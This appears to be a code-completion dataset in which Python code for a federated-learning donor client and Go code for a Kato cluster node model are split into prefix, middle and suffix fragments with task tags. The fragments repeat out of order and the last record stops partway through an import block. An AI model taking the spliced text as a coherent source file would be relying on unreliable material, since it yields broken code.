_mnegform = NegForm(self) #creates the negotiation form
self.verbose("Negform created. Beginning Negotation...")
try:
negstr = json.dumps(_mnegform.primary) #obtains the primary neg data
self._msocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._msocket.connect( ahostaddr ) #attempting to connect to the host (central)
self.debug("Host connected. Sending negstr")
smsg.send( self._msocket, negstr )
self.debug("Negotiation form sent to central. Awaiting synchronization")
self._mnegform = NegForm( json.loads( smsg.recv( self._msocket ) ) )
self.info("Synchronized form:")
self._mnegform.display()
self.partition_internals( self._mnegform.primary["bsize"] )
self.kernel = self._npdc.computeKernel()
if not type(self.kernel) == numpy.ndarray:
self.warn("Kernel computational error!")
else:
self.verbose("Partitioned and computed the kernel",self.kernel.shape)
except Exception as e:
self.expt(str(e),traceback.format_exc())
finally:
return self.hasNegotiated()
##############################################################################################
# These are common throughout almost all implementation and thus are implemented in the ABC
# updated: migrated from the conceptual class to this.
##############################################################################################
def display_internals(self):
|
def partition_internals(self, s_point):
'''invokes a partition command to perform splitting of the data set into the train/test'''
if self._npdc is not None:
self._npdc.batch(s_point)
else:
self.error("Failed to partition. NPDC is null!")
def normalize_internals(self):
'''perform normalization on the internal dataset, please call partition again'''
if self._npdc is not None:
self._npdc.stdnorm()
else:
self.error("Failed to normalize. NPDC is null!")
def sizeof_internals(self):
if self._npdc is not None:
return self._npdc.size()
else:
self.error("Failed to obtain sizes. NPDC is null!")
def shutdown_connections(self):
try:
self._msocket.close()
except Exception as e:
self.expt(str(e))
| '''invokes a display command to display the internal content using any data controllers'''
if self._npdc is not None:
self._npdc.show()
if self._mnegform is not None:
self._mnegform.display() | identifier_body |
vanilla.py | # vanilla.py (DONOR)
# vanilla donor is the vanilla version of a donor
# that is, it uses unencrypted sockets, no SSL/TLS
# and performs the most basic operations (generic)
from . import ConceptDonor
import csv, json
import numpy, pandas
import socket
import traceback
from io import StringIO
import traceback
# sklearn
from sklearn import preprocessing
# local
from preproc.aux import serialize, deserialize
import preproc.negotiate as negotiate
import preproc.controller as controller
NPDController = controller.NPDController
NegForm = negotiate.NegForm
import pyioneer.network.tcp.smsg as smsg
class VanillaDonor(ConceptDonor):
# dimension of the target. for multivariate, this > 1
tdim = 1
compd = numpy.double
def __init__(self,filename,ahasTarget, htype, skipc = 0, adelimiter=';', aquotechar ='"',
verbose=False, debug=False,owarn=False):
super().__init__(verbose=verbose,debug=debug)
'''creates the vanilla donor by reading in a file, filles the file
up and will read based on what the donor is created as (hasTarget or no?)'''
self._npdc = NPDController(verbose,debug,owarn)
self.hasTarget = ahasTarget
self._npdc.read( filename, ahasTarget,htype, skipc = skipc, adelimiter = adelimiter,
aquotechar = aquotechar)
# required implementations (the constructor must read in to fill up _mDmat, and
# possibly _mTvct if it hasTarget. the hasTarget must also be set to True if
# the donor truly possess the targets
def conntrain(self):
'''conntrain should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server and fill in the received alpha to _mdist_alpha'''
if( self.hasNegotiated() ):
self.verbose("Sending kernel to central")
#dumped = json.dumps( self.kernel.tolist() ) # THIS line is crashing the system (for size 10k)
dumped = serialize( self.kernel )
self.verbose("Total serial dump: {} bytes".format(len(dumped)))
smsg.send( self._msocket, dumped ) #json dump and send the array
# await confirmation
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
# proceed
if( self.hasTarget ):
# dump the target_train to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='train'))
smsg.send( self._msocket, dumped)
# await for alpha
self.info("All Kernels sent. Awaiting central response.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
try:
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
self.hasAlpha = False
except UnicodeDecodeError :
self.verbose("Unicode decode failed. Proceeding with deserialization")
self._mdistalpha = deserialize(rcv)
self.info("Distributed alpha received.")
self.hasAlpha=True
self.recover_weights() # perform weight recovery
else:
self.error("rcv is null. Receiving error _mdistalpha")
self.hasAlpha = False
else:
#failed
self.error("Failed to receive ACKN from host. Terminating conntrain")
self.hasAlpha = False
else:
self.error("This donor has not synchronized the params with the central,\
please run negotiate( addr ) first !")
self.hasAlpha = False
return self.hasAlpha
def conntest(self):
'''conntest should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server which it will return the error rating of the model
RETURNS True upon No errors. False otherwise'''
if( self.isTrained ):
aggregate = self._npdc.get( side="data",batch="test").dot( self._mweights )
self.verbose("Sending test prediction to central",aggregate.shape)
#self.raw( aggregate )
dumped = serialize( aggregate )
smsg.send( self._msocket, dumped )
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
#proceed
if( self.hasTarget ):
# dump the target_test to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='test'))
smsg.send( self._msocket, dumped )
#await for test results
self.info("All Aggregates sent. Awaiting results.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
else:
self._mres = json.loads(rcv)
self.verbose("Received DML test results:")
self.info("MSE:", self._mres.get("mse"))
self.info("R2S:", self._mres.get("r2s"))
return True
else:
self.error("rcv is null. Receiving error on _mres")
else:
self.error("Failed to receive ACKN from host. Terminating conntest")
else:
self.error("Weights not available. Is the donor trained ?")
return False
def connpred(self):
#TODO: figure out how to implement this
pass
def recover_weights(self, colmajor=False):
'''recovers the weight'''
if( self.hasAlpha ):
ool = (1/self._mnegform.primary['rrlambda'])
self.debug("OOL (lval):",ool)
if( type(ool) != float and type(ool) != int):
self.warn("OOL not a float or int")
if( not colmajor ):
self._mweights = ool*self._npdc.get(\
side="data",batch="train").transpose().dot(\
self._mdistalpha)
else:
self._mweights = ool*self._npdc.get(\
side="data",batch="train").dot(\
self._mdistalpha)
if( type(self._mweights) == numpy.ndarray ):
self.isTrained = True
self.info("Weights recovered successfully",self._mweights.shape)
self.debug("Weights array:")
self.raw( self._mweights )
else:
self.isTrained = False
else:
self.isTrained = False
# common functions
def | (self,ahostaddr):
'''start negotation, first sends in the donor's own prepared negform to inform the
central about the number of entries/features, it is expected that _mDmat is read
from a file/stdin before this
@params ahostaddr - a tuple ('localhost',portnumber i.e 8000)'''
_mnegform = NegForm(self) #creates the negotiation form
self.verbose("Negform created. Beginning Negotation...")
try:
negstr = json.dumps(_mnegform.primary) #obtains the primary neg data
self._msocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._msocket.connect( ahostaddr ) #attempting to connect to the host (central)
self.debug("Host connected. Sending negstr")
smsg.send( self._msocket, negstr )
self.debug("Negotiation form sent to central. Awaiting synchronization")
self._mnegform = NegForm( json.loads( smsg.recv( self._msocket ) ) )
self.info("Synchronized form:")
self._mnegform.display()
self.partition_internals( self._mnegform.primary["bsize"] )
self.kernel = self._npdc.computeKernel()
if not type(self.kernel) == numpy.ndarray:
self.warn("Kernel computational error!")
else:
self.verbose("Partitioned and computed the kernel",self.kernel.shape)
except Exception as e:
self.expt(str(e),traceback.format_exc())
finally:
return self.hasNegotiated()
##############################################################################################
# These are common throughout almost all implementation and thus are implemented in the ABC
# updated: migrated from the conceptual class to this.
##############################################################################################
def display_internals(self):
'''invokes a display command to display the internal content using any data controllers'''
if self._npdc is not None:
self._npdc.show()
if self._mnegform is not None:
self._mnegform.display()
def partition_internals(self, s_point):
'''invokes a partition command to perform splitting of the data set into the train/test'''
if self._npdc is not None:
self._npdc.batch(s_point)
else:
self.error("Failed to partition. NPDC is null!")
def normalize_internals(self):
'''perform normalization on the internal dataset, please call partition again'''
if self._npdc is not None:
self._npdc.stdnorm()
else:
self.error("Failed to normalize. NPDC is null!")
def sizeof_internals(self):
if self._npdc is not None:
return self._npdc.size()
else:
self.error("Failed to obtain sizes. NPDC is null!")
def shutdown_connections(self):
try:
self._msocket.close()
except Exception as e:
self.expt(str(e))
| negotiate | identifier_name |
vanilla.py | # vanilla.py (DONOR)
# vanilla donor is the vanilla version of a donor
# that is, it uses unencrypted sockets, no SSL/TLS
# and performs the most basic operations (generic)
from . import ConceptDonor
import csv, json
import numpy, pandas
import socket
import traceback
from io import StringIO
import traceback
# sklearn
from sklearn import preprocessing
# local
from preproc.aux import serialize, deserialize
import preproc.negotiate as negotiate
import preproc.controller as controller
NPDController = controller.NPDController
NegForm = negotiate.NegForm
import pyioneer.network.tcp.smsg as smsg
class VanillaDonor(ConceptDonor):
# dimension of the target. for multivariate, this > 1
tdim = 1
compd = numpy.double
def __init__(self,filename,ahasTarget, htype, skipc = 0, adelimiter=';', aquotechar ='"',
verbose=False, debug=False,owarn=False):
super().__init__(verbose=verbose,debug=debug)
'''creates the vanilla donor by reading in a file, filles the file
up and will read based on what the donor is created as (hasTarget or no?)'''
self._npdc = NPDController(verbose,debug,owarn)
self.hasTarget = ahasTarget
self._npdc.read( filename, ahasTarget,htype, skipc = skipc, adelimiter = adelimiter,
aquotechar = aquotechar)
# required implementations (the constructor must read in to fill up _mDmat, and
# possibly _mTvct if it hasTarget. the hasTarget must also be set to True if
# the donor truly possess the targets
def conntrain(self):
'''conntrain should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server and fill in the received alpha to _mdist_alpha'''
if( self.hasNegotiated() ):
self.verbose("Sending kernel to central")
#dumped = json.dumps( self.kernel.tolist() ) # THIS line is crashing the system (for size 10k)
dumped = serialize( self.kernel )
self.verbose("Total serial dump: {} bytes".format(len(dumped)))
smsg.send( self._msocket, dumped ) #json dump and send the array
# await confirmation
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
# proceed
if( self.hasTarget ):
# dump the target_train to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='train'))
smsg.send( self._msocket, dumped)
# await for alpha
self.info("All Kernels sent. Awaiting central response.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
try:
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
self.hasAlpha = False
except UnicodeDecodeError :
self.verbose("Unicode decode failed. Proceeding with deserialization")
self._mdistalpha = deserialize(rcv)
self.info("Distributed alpha received.")
self.hasAlpha=True
self.recover_weights() # perform weight recovery
else:
self.error("rcv is null. Receiving error _mdistalpha") | self.error("Failed to receive ACKN from host. Terminating conntrain")
self.hasAlpha = False
else:
self.error("This donor has not synchronized the params with the central,\
please run negotiate( addr ) first !")
self.hasAlpha = False
return self.hasAlpha
def conntest(self):
'''conntest should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server which it will return the error rating of the model
RETURNS True upon No errors. False otherwise'''
if( self.isTrained ):
aggregate = self._npdc.get( side="data",batch="test").dot( self._mweights )
self.verbose("Sending test prediction to central",aggregate.shape)
#self.raw( aggregate )
dumped = serialize( aggregate )
smsg.send( self._msocket, dumped )
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
#proceed
if( self.hasTarget ):
# dump the target_test to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='test'))
smsg.send( self._msocket, dumped )
#await for test results
self.info("All Aggregates sent. Awaiting results.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
else:
self._mres = json.loads(rcv)
self.verbose("Received DML test results:")
self.info("MSE:", self._mres.get("mse"))
self.info("R2S:", self._mres.get("r2s"))
return True
else:
self.error("rcv is null. Receiving error on _mres")
else:
self.error("Failed to receive ACKN from host. Terminating conntest")
else:
self.error("Weights not available. Is the donor trained ?")
return False
def connpred(self):
#TODO: figure out how to implement this
pass
def recover_weights(self, colmajor=False):
'''recovers the weight'''
if( self.hasAlpha ):
ool = (1/self._mnegform.primary['rrlambda'])
self.debug("OOL (lval):",ool)
if( type(ool) != float and type(ool) != int):
self.warn("OOL not a float or int")
if( not colmajor ):
self._mweights = ool*self._npdc.get(\
side="data",batch="train").transpose().dot(\
self._mdistalpha)
else:
self._mweights = ool*self._npdc.get(\
side="data",batch="train").dot(\
self._mdistalpha)
if( type(self._mweights) == numpy.ndarray ):
self.isTrained = True
self.info("Weights recovered successfully",self._mweights.shape)
self.debug("Weights array:")
self.raw( self._mweights )
else:
self.isTrained = False
else:
self.isTrained = False
# common functions
def negotiate(self,ahostaddr):
'''start negotation, first sends in the donor's own prepared negform to inform the
central about the number of entries/features, it is expected that _mDmat is read
from a file/stdin before this
@params ahostaddr - a tuple ('localhost',portnumber i.e 8000)'''
_mnegform = NegForm(self) #creates the negotiation form
self.verbose("Negform created. Beginning Negotation...")
try:
negstr = json.dumps(_mnegform.primary) #obtains the primary neg data
self._msocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._msocket.connect( ahostaddr ) #attempting to connect to the host (central)
self.debug("Host connected. Sending negstr")
smsg.send( self._msocket, negstr )
self.debug("Negotiation form sent to central. Awaiting synchronization")
self._mnegform = NegForm( json.loads( smsg.recv( self._msocket ) ) )
self.info("Synchronized form:")
self._mnegform.display()
self.partition_internals( self._mnegform.primary["bsize"] )
self.kernel = self._npdc.computeKernel()
if not type(self.kernel) == numpy.ndarray:
self.warn("Kernel computational error!")
else:
self.verbose("Partitioned and computed the kernel",self.kernel.shape)
except Exception as e:
self.expt(str(e),traceback.format_exc())
finally:
return self.hasNegotiated()
##############################################################################################
# These are common throughout almost all implementation and thus are implemented in the ABC
# updated: migrated from the conceptual class to this.
##############################################################################################
def display_internals(self):
'''invokes a display command to display the internal content using any data controllers'''
if self._npdc is not None:
self._npdc.show()
if self._mnegform is not None:
self._mnegform.display()
def partition_internals(self, s_point):
'''invokes a partition command to perform splitting of the data set into the train/test'''
if self._npdc is not None:
self._npdc.batch(s_point)
else:
self.error("Failed to partition. NPDC is null!")
def normalize_internals(self):
'''perform normalization on the internal dataset, please call partition again'''
if self._npdc is not None:
self._npdc.stdnorm()
else:
self.error("Failed to normalize. NPDC is null!")
def sizeof_internals(self):
if self._npdc is not None:
return self._npdc.size()
else:
self.error("Failed to obtain sizes. NPDC is null!")
def shutdown_connections(self):
try:
self._msocket.close()
except Exception as e:
self.expt(str(e)) | self.hasAlpha = False
else:
#failed | random_line_split |
node.go | // KATO, Application Management Platform
// Copyright (C) 2021 Gridworkz Co., Ltd.
// Permission is hereby granted, free of charge, to any person obtaining a copy of this
// software and associated documentation files (the "Software"), to deal in the Software
// without restriction, including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
// to whom the Software is furnished to do so, subject to the following conditions:
// The above copyright notice and this permission notice shall be included in all copies or
// substantial portions of the Software.
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
// INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
// FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
// ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
package client
import (
"fmt"
"strings"
"time"
client "github.com/coreos/etcd/clientv3"
"github.com/coreos/etcd/mvcc/mvccpb"
conf "github.com/gridworkz/kato/cmd/node/option"
"github.com/gridworkz/kato/node/core/store"
"github.com/gridworkz/kato/util"
"github.com/pquerna/ffjson/ffjson"
"github.com/sirupsen/logrus"
v1 "k8s.io/api/core/v1"
)
//LabelOS - node label about os
var LabelOS = "beta.kubernetes.io/os"
var LabelGPU = "beta.kato.com/gpushare"
//APIHostNode
type APIHostNode struct {
ID string `json:"uuid" validate:"uuid"`
HostName string `json:"host_name" validate:"host_name"`
InternalIP string `json:"internal_ip" validate:"internal_ip|ip"`
ExternalIP string `json:"external_ip" validate:"external_ip|ip"`
RootPass string `json:"root_pass,omitempty"`
Privatekey string `json:"private_key,omitempty"`
Role HostRule `json:"role" validate:"role|required"`
PodCIDR string `json:"podCIDR"`
AutoInstall bool `json:"auto_install"`
Labels map[string]string `json:"labels"`
}
//Clone
func (a APIHostNode) Clone() *HostNode {
hn := &HostNode{
ID: a.ID,
HostName: a.HostName,
InternalIP: a.InternalIP,
ExternalIP: a.ExternalIP,
RootPass: a.RootPass,
KeyPath: a.Privatekey,
Role: a.Role,
Labels: map[string]string{"kato_node_hostname": a.HostName},
CustomLabels: map[string]string{},
NodeStatus: NodeStatus{Status: "not_installed", Conditions: make([]NodeCondition, 0)},
Status: "not_installed",
PodCIDR: a.PodCIDR,
//node default unscheduler
Unschedulable: true,
}
return hn
}
//HostNode - kato node entity
type HostNode struct {
ID string `json:"uuid"`
HostName string `json:"host_name"`
CreateTime time.Time `json:"create_time"`
InternalIP string `json:"internal_ip"`
ExternalIP string `json:"external_ip"`
RootPass string `json:"root_pass,omitempty"`
KeyPath string `json:"key_path,omitempty"` //Management node key file path
AvailableMemory int64 `json:"available_memory"`
AvailableCPU int64 `json:"available_cpu"`
Mode string `json:"mode"`
Role HostRule `json:"role"` //compute, manage, storage, gateway
Status string `json:"status"`
Labels map[string]string `json:"labels"` // system labels
CustomLabels map[string]string `json:"custom_labels"` // custom labels
Unschedulable bool `json:"unschedulable"` // Settings
PodCIDR string `json:"podCIDR"`
NodeStatus NodeStatus `json:"node_status"`
}
//Resource
type Resource struct {
CPU int `json:"cpu"`
MemR int `json:"mem"`
}
// NodePodResource -
type NodePodResource struct {
AllocatedResources `json:"allocatedresources"`
Resource `json:"allocatable"`
}
// AllocatedResources -
type AllocatedResources struct {
CPURequests int64
CPULimits int64
MemoryRequests int64
MemoryLimits int64
MemoryRequestsR string
MemoryLimitsR string
CPURequestsR string
CPULimitsR string
}
//NodeStatus
type NodeStatus struct {
//worker maintenance
Version string `json:"version"`
//worker maintenance example: unscheduler, offline
//Initiate a recommendation operation to the master based on the node state
AdviceAction []string `json:"advice_actions"`
//worker maintenance
Status string `json:"status"` //installed running offline unknown
//master maintenance
CurrentScheduleStatus bool `json:"current_scheduler"`
//master maintenance
NodeHealth bool `json:"node_health"`
//worker maintenance
NodeUpdateTime time.Time `json:"node_update_time"`
//master maintenance
KubeUpdateTime time.Time `json:"kube_update_time"`
//worker maintenance node progress down time
LastDownTime time.Time `json:"down_time"`
//worker and master maintenance
Conditions []NodeCondition `json:"conditions,omitempty"`
//master maintenance
KubeNode *v1.Node
//worker and master maintenance
NodeInfo NodeSystemInfo `json:"nodeInfo,omitempty" protobuf:"bytes,7,opt,name=nodeInfo"`
}
//UpdateK8sNodeStatus update kato node status by k8s node
func (n *HostNode) UpdateK8sNodeStatus(k8sNode v1.Node) {
status := k8sNode.Status
n.UpdataK8sCondition(status.Conditions)
n.NodeStatus.NodeInfo = NodeSystemInfo{
MachineID: status.NodeInfo.MachineID,
SystemUUID: status.NodeInfo.SystemUUID,
BootID: status.NodeInfo.BootID,
KernelVersion: status.NodeInfo.KernelVersion,
OSImage: status.NodeInfo.OSImage,
OperatingSystem: status.NodeInfo.OperatingSystem,
ContainerRuntimeVersion: status.NodeInfo.ContainerRuntimeVersion,
Architecture: status.NodeInfo.Architecture,
}
}
// MergeLabels merges custom lables into labels.
func (n *HostNode) MergeLabels() map[string]string {
// TODO: Parallel
labels := make(map[string]string, len(n.Labels)+len(n.CustomLabels))
// copy labels
for k, v := range n.Labels {
labels[k] = v
}
for k, v := range n.CustomLabels {
if _, ok := n.Labels[k]; !ok {
labels[k] = v
}
}
return labels
}
// NodeSystemInfo is a set of ids/uuids to uniquely identify the node.
type NodeSystemInfo struct {
// MachineID reported by the node. For unique machine identification
// in the cluster this field is preferred. Learn more from man(5)
// machine-id: http://man7.org/linux/man-pages/man5/machine-id.5.html
MachineID string `json:"machineID"`
// SystemUUID reported by the node. For unique machine identification
// MachineID is preferred. This field is specific to Red Hat hosts
// https://access.redhat.com/documentation/en-US/Red_Hat_Subscription_Management/1/html/RHSM/getting-system-uuid.html
SystemUUID string `json:"systemUUID"`
// Boot ID reported by the node.
BootID string `json:"bootID" protobuf:"bytes,3,opt,name=bootID"`
// Kernel Version reported by the node from 'uname -r' (e.g. 3.16.0-0.bpo.4-amd64).
KernelVersion string `json:"kernelVersion" `
// OS Image reported by the node from /etc/os-release (e.g. Debian GNU/Linux 7 (wheezy)).
OSImage string `json:"osImage"`
// ContainerRuntime Version reported by the node through runtime remote API (e.g. docker://1.5.0).
ContainerRuntimeVersion string `json:"containerRuntimeVersion"`
// The Operating System reported by the node
OperatingSystem string `json:"operatingSystem"`
// The Architecture reported by the node
Architecture string `json:"architecture"`
MemorySize uint64 `json:"memorySize"`
NumCPU int64 `json:"cpu_num"`
}
const (
//Running node running status
Running = "running"
//Offline node offline status
Offline = "offline"
//Unknown node unknown status
Unknown = "unknown"
//Error node error status
Error = "error"
//Init node init status
Init = "init"
//InstallSuccess node install success status
InstallSuccess = "install_success"
//InstallFailed node install failure status
InstallFailed = "install_failed"
//Installing node installing status
Installing = "installing"
//NotInstalled node not install status
NotInstalled = "not_installed"
)
//Decode - decode node info
func (n *HostNode) Decode(data []byte) error {
if err := ffjson.Unmarshal(data, n); err != nil {
logrus.Error("decode node info error:", err.Error())
return err
}
return nil
}
//NodeList
type NodeList []*HostNode
func (list NodeList) Len() int {
return len(list)
}
func (list NodeList) Less(i, j int) bool {
return list[i].InternalIP < list[j].InternalIP
}
func (list NodeList) Swap(i, j int) {
var temp = list[i]
list[i] = list[j]
list[j] = temp
}
//GetNodeFromKV - parse node information from etcd
func GetNodeFromKV(kv *mvccpb.KeyValue) *HostNode {
var node HostNode
if err := ffjson.Unmarshal(kv.Value, &node); err != nil {
logrus.Error("parse node info error:", err.Error())
return nil
}
return &node
}
//UpdataK8sCondition - update the status of the k8s node to the kato node
func (n *HostNode) UpdataK8sCondition(conditions []v1.NodeCondition) {
for _, con := range conditions {
var rbcon NodeCondition
if NodeConditionType(con.Type) == "Ready" {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionStatus(con.Status),
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
} else {
if con.Status != v1.ConditionFalse {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionFalse,
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
}
}
n.UpdataCondition(rbcon)
}
}
//DeleteCondition
func (n *HostNode) DeleteCondition(types ...NodeConditionType) {
for _, t := range types {
for i, c := range n.NodeStatus.Conditions {
if c.Type.Compare(t) {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions[:i], n.NodeStatus.Conditions[i+1:]...)
break
}
}
}
}
// UpdateReadyStatus
func (n *HostNode) UpdateReadyStatus() {
var status = ConditionTrue
var Reason, Message string
for _, con := range n.NodeStatus.Conditions {
if con.Status != ConditionTrue && con.Type != "" && con.Type != NodeReady {
logrus.Debugf("because %s id false, will set node %s(%s) health is false", con.Type, n.ID, n.InternalIP)
status = ConditionFalse
Reason = con.Reason
Message = con.Message
break
}
}
n.GetAndUpdateCondition(NodeReady, status, Reason, Message)
}
//GetCondition
func (n *HostNode) | (ctype NodeConditionType) *NodeCondition {
for _, con := range n.NodeStatus.Conditions {
if con.Type.Compare(ctype) {
return &con
}
}
return nil
}
// GetAndUpdateCondition get old condition and update it, if old condition is nil and then create it
func (n *HostNode) GetAndUpdateCondition(condType NodeConditionType, status ConditionStatus, reason, message string) {
oldCond := n.GetCondition(condType)
now := time.Now()
var lastTransitionTime time.Time
if oldCond == nil {
lastTransitionTime = now
} else {
if oldCond.Status != status {
lastTransitionTime = now
} else {
lastTransitionTime = oldCond.LastTransitionTime
}
}
cond := NodeCondition{
Type: condType,
Status: status,
LastHeartbeatTime: now,
LastTransitionTime: lastTransitionTime,
Reason: reason,
Message: message,
}
n.UpdataCondition(cond)
}
//UpdataCondition
func (n *HostNode) UpdataCondition(conditions ...NodeCondition) {
for _, newcon := range conditions {
if newcon.Type == "" {
continue
}
var update bool
if n.NodeStatus.Conditions != nil {
for i, con := range n.NodeStatus.Conditions {
if con.Type.Compare(newcon.Type) {
n.NodeStatus.Conditions[i] = newcon
update = true
break
}
}
}
if !update {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions, newcon)
}
}
}
//HostRule
type HostRule []string
//SupportNodeRule
var SupportNodeRule = []string{ComputeNode, ManageNode, StorageNode, GatewayNode}
//ComputeNode
var ComputeNode = "compute"
//ManageNode
var ManageNode = "manage"
//StorageNode
var StorageNode = "storage"
//GatewayNode
var GatewayNode = "gateway"
//HasRule
func (h HostRule) HasRule(rule string) bool {
for _, v := range h {
if v == rule {
return true
}
}
return false
}
func (h HostRule) String() string {
return strings.Join(h, ",")
}
//Add role
func (h *HostRule) Add(role ...string) {
for _, r := range role {
if !util.StringArrayContains(*h, r) {
*h = append(*h, r)
}
}
}
//Validation - host rule validation
func (h HostRule) Validation() error {
if len(h) == 0 {
return fmt.Errorf("node rule cannot be enpty")
}
for _, role := range h {
if !util.StringArrayContains(SupportNodeRule, role) {
return fmt.Errorf("node role %s can not be supported", role)
}
}
return nil
}
//NodeConditionType
type NodeConditionType string
// These are valid conditions of node.
const (
// NodeReady means this node is working
NodeReady NodeConditionType = "Ready"
KubeNodeReady NodeConditionType = "KubeNodeReady"
NodeUp NodeConditionType = "NodeUp"
// InstallNotReady means the installation task was not completed in this node.
InstallNotReady NodeConditionType = "InstallNotReady"
OutOfDisk NodeConditionType = "OutOfDisk"
MemoryPressure NodeConditionType = "MemoryPressure"
DiskPressure NodeConditionType = "DiskPressure"
PIDPressure NodeConditionType = "PIDPressure"
)
var masterCondition = []NodeConditionType{NodeReady, KubeNodeReady, NodeUp, InstallNotReady, OutOfDisk, MemoryPressure, DiskPressure, PIDPressure}
//IsMasterCondition Whether it is a preset condition of the system
func IsMasterCondition(con NodeConditionType) bool {
for _, c := range masterCondition {
if c.Compare(con) {
return true
}
}
return false
}
//Compare
func (nt NodeConditionType) Compare(ent NodeConditionType) bool {
return string(nt) == string(ent)
}
//ConditionStatus
type ConditionStatus string
// These are valid condition statuses. "ConditionTrue" means a resource is in the condition.
// "ConditionFalse" means a resource is not in the condition. "ConditionUnknown" means kubernetes
// can't decide if a resource is in the condition or not. In the future, we could add other
// intermediate conditions, e.g. ConditionDegraded.
const (
ConditionTrue ConditionStatus = "True"
ConditionFalse ConditionStatus = "False"
ConditionUnknown ConditionStatus = "Unknown"
)
// NodeCondition contains condition information for a node.
type NodeCondition struct {
// Type of node condition.
Type NodeConditionType `json:"type" `
// Status of the condition, one of True, False, Unknown.
Status ConditionStatus `json:"status" `
// Last time we got an update on a given condition.
// +optional
LastHeartbeatTime time.Time `json:"lastHeartbeatTime,omitempty" `
// Last time the condition transit from one status to another.
// +optional
LastTransitionTime time.Time `json:"lastTransitionTime,omitempty" `
// (brief) reason for the condition's last transition.
// +optional
Reason string `json:"reason,omitempty"`
// Human readable message indicating details about last transition.
// +optional
Message string `json:"message,omitempty"`
}
//String
func (n *HostNode) String() string {
res, _ := ffjson.Marshal(n)
return string(res)
}
//Update node info
func (n *HostNode) Update() (*client.PutResponse, error) {
savenode := *n
savenode.NodeStatus.KubeNode = nil
return store.DefalutClient.Put(conf.Config.NodePath+"/"+n.ID, savenode.String())
}
//DeleteNode
func (n *HostNode) DeleteNode() (*client.DeleteResponse, error) {
return store.DefalutClient.Delete(conf.Config.NodePath + "/" + n.ID)
}
//DelEndpoints
func (n *HostNode) DelEndpoints() {
keys, err := n.listEndpointKeys()
if err != nil {
logrus.Warningf("error deleting endpoints: %v", err)
return
}
for _, key := range keys {
_, err := store.DefalutClient.Delete(key)
if err != nil {
logrus.Warnf("key: %s; error delete endpoints: %v", key, err)
}
}
}
func (n *HostNode) listEndpointKeys() ([]string, error) {
resp, err := store.DefalutClient.Get(KatoEndpointPrefix, client.WithPrefix())
if err != nil {
return nil, fmt.Errorf("prefix: %s; error list kato endpoint keys by prefix: %v", KatoEndpointPrefix, err)
}
var res []string
for _, kv := range resp.Kvs {
key := string(kv.Key)
if strings.Contains(key, n.InternalIP) {
res = append(res, key)
}
}
return res, nil
}
| GetCondition | identifier_name |
node.go | // KATO, Application Management Platform
// Copyright (C) 2021 Gridworkz Co., Ltd.
// Permission is hereby granted, free of charge, to any person obtaining a copy of this
// software and associated documentation files (the "Software"), to deal in the Software
// without restriction, including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
// to whom the Software is furnished to do so, subject to the following conditions:
// The above copyright notice and this permission notice shall be included in all copies or
// substantial portions of the Software.
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
// INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
// FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
// ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
package client
import (
"fmt"
"strings"
"time"
client "github.com/coreos/etcd/clientv3"
"github.com/coreos/etcd/mvcc/mvccpb"
conf "github.com/gridworkz/kato/cmd/node/option"
"github.com/gridworkz/kato/node/core/store"
"github.com/gridworkz/kato/util"
"github.com/pquerna/ffjson/ffjson"
